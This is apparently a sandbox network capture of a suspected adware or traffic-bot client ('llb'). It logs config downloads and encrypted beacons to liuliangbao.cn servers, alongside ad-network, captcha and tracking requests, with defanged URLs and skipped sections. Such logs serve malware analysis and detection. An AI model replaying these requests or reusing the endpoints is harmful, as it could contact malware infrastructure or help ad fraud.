n.q._.n.d.o.m.a.i.n.=.1.I.F.I.9.F.b.3.0.3.c.b.e.a.3.8.8.4.1.1.8.d.

<<< skipped >>>

GET /js/marketplace.min.js HTTP/1.1

Accept: */*

Referer: hXXp://pornvideo-box.com/trade

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: static.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:04 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1458677340"

Cache-Control: max-age=86400

Content-Length: 13871

Content-Type: application/javascript

X-HW: 1484906105.dop011.fr7.t,1484906104.cds071.fr7.c

Last-Modified: Tue, 22 Mar 2016 20:09:00 GMT
window.mp_ads_pageLoadedTS||(window.mp_ads_pageLoadedTS=Math.round( ne
w Date/1E3));window.mp_ads_pageLoaded||(window.mp_ads_pageLoaded=funct
ion(d){});.if(!window.mp_ads_pageUUIDGen){mp_ads_pageUUIDGen=function 
b(c){return c?(c^16*Math.random()>>c/4).toString(16):([1E7] -1E3
 -4E3 -8E3 -1E11).replace(/[018]/g,b)};window.mp_ads_pageUUID=mp_ads_p
ageUUIDGen();var ads_beforeunload=function(){var d=window.MPstatTracke
r(30)._getAds(),c;for(c in d)if(void 0!=d[c]){var e=d[c];void 0!=e.mou
seover_start&&0!=e.mouseover_start&&(e.mouseover_end=Math.round( new D
ate/1E3),e.mouseover_last_timecount=e.mouseover_end-e.mouseover_start,
e.mouseover_start=0,1<e.mouseover_last_timecount&&.window.MPstatTra
cker(30)._event(window.MPstatTracker(30)._getPageID(),"mouseover",'{"t
":' e.mouseover_last_timecount "}",spot),e.mouseover_last_timecount=0)
;if(void 0!=e.viewed_start&&0!=e.viewed_start){e.viewed_end=Math.round
( new Date/1E3);var a=e.viewed_end-e.viewed_start;e.viewed_start=0;e.v
iewed_end=0;e.exposed =a}2<=e.exposed&&window.MPstatTracker(30)._aj
axevent(window.MPstatTracker(30)._getPageID(),"unload",'{"t":' (Math.r
ound( new Date/1E3)-e.loadTS) ',"v":' e.viewed ',"e":' e.exposed "}",.
e.spotid)}window.MPstatTracker(30)._ajaxevent(window.MPstatTracker(30)
._getPageID(),"unload",'{"ts":' window.MPstatTracker(30)._getPageLoadT
S() ',"t:"' (Math.round( new Date/1E3)-window.MPstatTracker(30)._getPa
geLoadTS()) "}",0)};try{window.addEventListener("beforeunload",functio
n(){ads_beforeunload()})}catch(e$$12){(function(){var d=window.onb<<< skipped >>>

GET /clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924 HTTP/1.1

Accept-Encoding: gzip, deflate

User-Agent: llb/1.1.73.813

Connection: Keep-Alive

Cache-Control: no-cache

Host: cltres3.liuliangbao.cn


HTTP/1.1 200 OK

Server: Tengine

Content-Type: text/xml

Content-Length: 1097

Connection: keep-alive

Date: Fri, 20 Jan 2017 08:48:30 GMT

Last-Modified: Sat, 14 Jan 2017 19:50:01 GMT

ETag: "587a80e9-449"

Accept-Ranges: bytes

Via: cache8.l2et15[0,304-0,H], cache15.l2et15[1,0], kunlun7.cn405[0,200-0,H], kunlun7.cn405[0,0]

Age: 3975

X-Cache: HIT TCP_MEM_HIT dirn:10:832961061

X-Swift-SaveTime: Fri, 20 Jan 2017 09:16:02 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: 74cf750714849060851558647e
<?xml version="1.0" encoding="UTF-8"?>..<files>...<file
 name="SearchEngine.ini" md5="a9045b28803c4b4a412ee972d7c62fdd" url="h
ttp://cltres.liuliangbao.cn/clt/config/SearchEngine_6.5.ini?t=14809156
91" />...<file name="GlobalConfig.ini" md5="07b964e0fb090c88d191
61a49a026d27" url="hXXp://cltres.liuliangbao.cn/clt/config/GlobalConfi
g_6.5.ini?t=1480915691" />...<file name="HLR_cfg.ini" md5="4a580
c2fcfdf6fdc144c9d7dd92f5e4a" url="hXXp://cltres.liuliangbao.cn/clt/con
fig/cfg_6.5.ini?t=1480915691" />...<file name="blhash.dat" baseF
older="$DocumentRoot" md5="dd2223f7843fa688b2fa85ca6abbe764" url="http
://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat?t=1484423401" z
ipUrl="hXXp://ap.liuliangbao.cn/as/down/clt/config/blhash_6.5.dat.zip?
t=1484423401" />...<file name="bl.dat" baseFolder="$DocumentRoot
" md5="4a6482d5c6a6f033e8a19c9286978c06" url="hXXp://cltres.liuliangba
o.cn/clt/config/bl_6.5.dat?t=1484423401" />...<file name="runtas
k.dat" baseFolder="$DocumentRoot" md5="58150b04e4d1f65e5cc86e44a40b03d
e" url="hXXp://cltres.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480
915691" />..</files>....<<< skipped >>>

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: data.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.9.4

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/xml

Content-Length: 261

Last-Modified: Wed, 27 Jul 2016 03:17:13 GMT

Connection: keep-alive

ETag: "579827b9-105"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<cross-domain-policy&
gt;.. <allow-access-from domain="*.qiyi.com"/>.. <allow-acces
s-from domain="*.iqiyi.com"/>.. <allow-access-from domain="*.pps
.tv"/>.. <allow-access-from domain="*.qiyi.domain"/>..</cr
oss-domain-policy>......


GET /uid?tn=0.016473443247377872 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: data.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.9.4

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/html

Connection: keep-alive

Content-Length: 51

Cache-Control: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true
var uid={"uid":"50abcfee17401c5e49d85f293b5d764e"};....


GET /uid?tn=0.4324387479573488 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/player/cupid/common/clear.swf?r=6yuxxr

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: data.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.9.4

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/html

Connection: keep-alive

Content-Length: 51

Cache-Control: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true
var uid={"uid":"3810488db15876ddac862da8c4a5320b"};..

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heyLT0pUyDiycWLTHdeJJaAdRT4maqHQLm9Y0AoCVAtZFJmB0rLnPKe4Awt6Yb-DkFjW8GmYsoqfjuDFyd-_33gEKpi2PHNuN-K8WV-zOdz9qxfzUr9BQGPFQ71MpT1UOK20_jRDH2XBUi6uJfEYhV9I3WMZWOKqr8vXvqhXEwLNLQk2B9X7RuULD4wZcA4WJD7s9GaHjd_JwDEtxobOrxX2D8KGBYiZSpTER0cZ8YEvjn2jqHCVe-dJp14Mc2F6Zszm6zwTXyROtTHpyWjCtYpY1kQe_wR-fcV_vEag-5GxfIq3O9uZYW4SQvx94a1YipoLuLAFXviTZpLe_1WYbMdepAHZNPONGVwjzQqaL89TcPXZiM0TCTEI1-H1A-2ljb&v=404&seq=2 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:10 GMT

Cache-Control: no-cache

0..

GET /ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=003c6b87-acf8-41d3-a0d5-191629132b3d; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1319961" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1319961_1484906106" name="1319961_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=29_1484906106070879_21559&uuid=003c6b87-acf8-41d3-a0d5-19162
9132b3d" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1319961" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAAAZJBQAGSQUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

POST /as/2/h1/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 202

Connection: Keep-Alive

Cache-Control: no-cache

d=aa60ecd8d19bbadb3efa5632e921ea6b5c143c235f1ec9de2fafd50b341fe99c6865f0034b745dd0038888395f5c8e922920fe25e359c99d7e46cd45a28fc8fa01f1d69e1d5d2101af2a17075a8ca54ccde9b0af9f43da5a6982f1f34b8611354e977abf
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:42 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
88.................0..V.....:F.;..p./.$D...A..#......\.C.N..j..].f|~..
....v.N.!-....o...}.W.....ij.5\.*]4/I...OX..y.....?....s...y....^2....
..0......


POST /as/2/h3/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 152

Connection: Keep-Alive

Cache-Control: no-cache

d=788bb42704101c171492800c59e2e304603affb1f5f4d8e08f09be352e7da44e2a0f4794ef5c5484d6c4c291526746afb5b67541bb6f8f1072c1cc43a4ca21d2da00b73f0cdadea0dcf369
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:42 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

5c.................0....8. .8c.......\.....f.f.....C$.9tq..c*7Rk!....-
a.-..j\...6_..;.d}...Vb.....0......

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 156

Connection: Keep-Alive

Cache-Control: no-cache

d=e4bc676f0ba8012a9e9feae465e3f7976e649b5c0764d89ce50328974222f881f92a40ca14fb2aae4f2f3105e2751f7430029c89576400d9ea612f312540a39d4b6052cda42f5660c3372e6b21
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:44 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

54.................!.....Y..........o..{...r....*...#.W..V0K.1...../.n
.Z2c.....~....P.....0......

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 156

Connection: Keep-Alive

Cache-Control: no-cache

d=ff429a3b07622e825f87a82f46f43f586e649b5c0764d89ce50328974222f881f92a40ca14fb2aae4f2f3105e2751f7430029c89576400d9ea612f312540a39d4b6052cda42f5660c3372e6b24
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:44 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

52.................!...J....\..B..............M..r..'i...,)(z...u.....
T]7.....A..YP.....0......

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 156

Connection: Keep-Alive

Cache-Control: no-cache

d=0025787f6b2b534e7f7842f783b0e70b6e649b5c0764d89ce50328974222f88152958c354a19281f4f2f3105e2751f7430029c89576400d9ea612f312540a39d4b6052cda42f5660c3372e6b22
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:45 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

54..............[..!..@K.}.. A.B[....I....U6..@..U...Lf..zb..W .u.._..
ye.dG..g.....lP.....0......

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 1206

Connection: Keep-Alive

Cache-Control: no-cache

d=6f0ff219a3966da56b611bc1931384af20582aad0b62a1739627ecb8aa6c233e386c1b8626511e9bba601d31f579eb4e4462758ff9cfb480b0c6989531da02953962a7fffbd21f8d22ca2db893b49871ae4af94a7d6334463e4a130a89cb8a2a3888490f0f33ca482c986fc249799bde017a1fbe6bba65a98bff06e2d58cd4dbcafa8e90959d95e4f9c3486db02a0d9a58bda732ff8dd7b124ffeebf8555e399c6a4c9eaeca235f311c9979e52445b64201e0b60aacfe2a72de465d05fc14520931281b6735de2bdeafb9571ef6833d66bbe13dfc4eda12b8249df903ee3a295a7d938811d1c2107b539ae0160ac9d506b493a56a2fce632584d5ad25bbece9113a8b230c34aa7c8682cdef8fdbe35850b6e10dbeb58d5c110c3b5f3623b51e7f8e0871029de96f03634d53857c552f35adf298637d0ef52648371f321506de1c9eed036fe2197f4c6bbaee05d6baa005654b1a749def404c3a4a0cd1fb2885e3de2a6ca3b5aef373c8ee29101842677ac01bbca09f179a96e895bb295e2e55699ed0ddfffa6df45c86c8a68dd7f45ea70c2fb2b36c5868ac1771350e00e7ab4e04cdbbb6975ebfb0e42c6e8effc6843aeeeaa48d809af38f274b284e79c94120a1732aa69c86c497315acf82ab16ed0a8b42e2b736575a4b898a88584619aa3b437bafff70846b939de6a8698fd4627e595328ea99e6951bf3122ae4c99c4ce3166af7ca9c862242b03c709f02e9790bf69054c53ba5d1a4b65c10084e19cd2bd1bfce3ceab50e5eaaf50a9b5416891c04da66d14f83e35a394fb69320e7856ebd5b46e6aba6e982cbc76ec519ae2e9cb729299da45fab04423
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:56 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

52.................1..@KP...4...._........dN....f.....Z."......G'.Q=`.
3...`...@A..P.....0......

GET /ads?spot_id=2007013&rand=1853651284&impid=54_1484906106583286_7218&uuid=b3da0bc7-5356-4cf4-8cd7-941025e2cf15 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1344021&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2f1.............T]..6.. n*.V*$v>..l......V]U...../....e._......T..B
|<>3sf<...n..p..^.o.'..~.sGQ.Q;pWGgwX...6...^. ..U.:...t.....
.R..............2.1...J6....j%..:z...OZ9*.......=..E(./Km....s.Tql..Yz
8....N.....&....F....(H.......|..s..M.s.]=n.?...da.f5.x.M......y...rY.
...=,$U>.x.......,}.l..V......(...22.d.H..4 ))..P.Q6.M'G0.0KVx....`
.1`..b........d....h.<.r..t$....^.....p.|$ ..s:..=....y.....i..K(5.
.O..v.<..E..\.I....n.>....[.%o^..} ...3\.i.cRf.*/.{.b.z.....ge.N
...y...h .rN..^,.~Aw...Nw?o"tk..`..P.$.}.:.........A8.U.,...7.A....K..
.q.A.......u.1.n.:....t?hyv....V..%?..........y..h .#.l[G.......h..f..
.....UL...S...C..(d|6RS..>..Q.....o...5.j.q........%.B-.R.'P .pb.v.
.p..=C.`......@....90,_....R..9[.&...L.....J]G T4...@...........0..(..
h~..1.7.E.h......0..

GET /get.php?callback=gtcallback HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 2778

Connection: keep-alive

Etag: "31b67ea84f8d1f83124ad7a043f831f08280500f"

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Set-Cookie: GeeTestUser=ccf526b5246e2cdca158bde4d19efdab; expires=Sun, 19 Feb 2017 09:55:18 GMT; Path=/
.(function () {.    var head = document.getElementsByTagName('head')[0
];.    var loadJS = function (url, callback) {.        var s = documen
t.createElement('script');.        var loaded = false;.        var onl
oad = function () {.            if (!loaded &&.                (!s.rea
dyState.                    || "loaded" === s.readyState.             
       || "complete" === s.readyState)) {.                loaded = tru
e;..                // setTimeout for IE10-.                setTimeout
(function () {.                    callback(false);.                },
 0);.            }.        };.        var onerror = function () {.    
        callback(true);.        };.        s.charset = 'UTF-8';.      
  s.id = 'gt_lib';.        s.async = false;.        s.onload = s.onrea
dystatechange = onload;.        s.onerror = onerror;.        s.src = u
rl;.        head.appendChild(s);.    };.    var normalizeDomain = func
tion (domain) {.        // return domain.replace(/^https?:\/\/|\/.*$/g
, '');.        return domain.replace(/^https?:\/\/|\/$/g, '');.    };.
    var normalizePath = function (path) {.        path = path.replace(
/\/ /g, '/');.        if (path.indexOf('/') !== 0) {.            path 
= '/'   path;.        }.        return path;.    };.    var makeURL = 
function (protocol, domain, path) {.        domain = normalizeDomain(d
omain);.        var url = normalizePath(path);.        if (domain) {. 
           url = protocol   domain   url;.        }.        return url
;.    };..    var load = function (protocol, domains, path, callba<<< skipped >>>

GET /get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=7185e65f5aea0024bf35c5c1275d75da&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906123874 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:19 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 761

Connection: keep-alive

Etag: "4fb290d13f1c762630c16d5ebd823cdecdb1128c"

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

geetest_1484906123874({"staticservers": ["static.geetest.com/", "dn-st
aticdown.qbox.me/"], "xpos": 0, "theme_version": "3.2.0", "height": 11
6, "challenge": "7185e65f5aea0024bf35c5c1275d75dal5", "benchmark": fal
se, "type": "slide", "logo": true, "mobile": false, "clean": false, "s
lice": "pictures/gt/7ed8940e0/slice/69cbb884.png", "show_delay": 250, 
"product": "embed", "hide_delay": 800, "id": "a7185e65f5aea0024bf35c5c
1275d75da", "feedback": "hXXp://VVV.geetest.com/contact#report", "apis
erver": "hXXp://api.geetest.com/", "theme": "golden", "ypos": 0, "link
": "", "fullbg": "pictures/gt/7ed8940e0/7ed8940e0.jpg", "version": "5.
10.0", "gt": "3386e03c620a4067f18fa92c370f1594", "fullpage": false, "b
g": "pictures/gt/7ed8940e0/bg/69cbb884.jpg", "https": false})HTTP/1.1 
200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:19 GMT..Content-Ty
pe: text/javascript;charset=UTF-8..Content-Length: 761..Connection: ke
ep-alive..Etag: "4fb290d13f1c762630c16d5ebd823cdecdb1128c"..Cache-Cont
rol: no-cache, no-store, must-revalidate..Pragma: no-cache..Expires: 0
..geetest_1484906123874({"staticservers": ["static.geetest.com/", "dn-
staticdown.qbox.me/"], "xpos": 0, "theme_version": "3.2.0", "height": 
116, "challenge": "7185e65f5aea0024bf35c5c1275d75dal5", "benchmark": f
alse, "type": "slide", "logo": true, "mobile": false, "clean": false, 
"slice": "pictures/gt/7ed8940e0/slice/69cbb884.png", "show_delay": 250
, "product": "embed", "hide_delay": 800, "id": "a7185e65f5aea0024bf35c
5c1275d75da", "feedback": "hXXp://VVV.geetest.com/contact#report",

<<< skipped >>>

GET /refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da97&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906128459 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:21 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 353

Connection: keep-alive

Cache-Control: no-cache, no-store, must-revalidate

Expires: 0

Pragma: no-cache

Etag: "211b133b0fa04a51678bb1d63254748166f52632"

geetest_1484906128459({"ypos": 67, "type": "slide", "feedback": "http:
//VVV.geetest.com/contact#report", "link": "", "slice": "pictures/gt/d
0fe39770/slice/3c9db692.png", "fullbg": "pictures/gt/d0fe39770/d0fe397
70.jpg", "challenge": "7185e65f5aea0024bf35c5c1275d75da5s", "id": "", 
"height": 116, "xpos": 0, "bg": "pictures/gt/d0fe39770/bg/3c9db692.jpg
"})HTTP/1.1 200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:21 GMT
..Content-Type: text/javascript;charset=UTF-8..Content-Length: 353..Co
nnection: keep-alive..Cache-Control: no-cache, no-store, must-revalida
te..Expires: 0..Pragma: no-cache..Etag: "211b133b0fa04a51678bb1d632547
48166f52632"..geetest_1484906128459({"ypos": 67, "type": "slide", "fee
dback": "hXXp://VVV.geetest.com/contact#report", "link": "", "slice": 
"pictures/gt/d0fe39770/slice/3c9db692.png", "fullbg": "pictures/gt/d0f
e39770/d0fe39770.jpg", "challenge": "7185e65f5aea0024bf35c5c1275d75da5
s", "id": "", "height": 116, "xpos": 0, "bg": "pictures/gt/d0fe39770/b
g/3c9db692.jpg"})..

GET /ads?zone_id=1343921&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1689

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=9382141a-68b6-409b-8dfe-9704cf9ba99c; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1343921" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1343921_1484906106" name="1343921_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=52_1484906106135386_5191&uuid=9382141a-68b6-409b-8dfe-9704cf
9ba99c" width="300" height="250" scrolling="no" frameborder="0" allowt
ransparency="true" marginwidth="0" marginheight="0" z_id="1343921" c_i
d="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://ad
s.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB63
oFYAAAAAAAAAACxgRQAsYEUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAAA<<< skipped >>>

GET /so/zz.gif?url=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&sid=fa1c7fce79127597cbed202ea98aec2c&token=feaq1ccc7qfkcrer79911=2t7s5i9l7? HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: s.360.cn

Connection: Keep-Alive


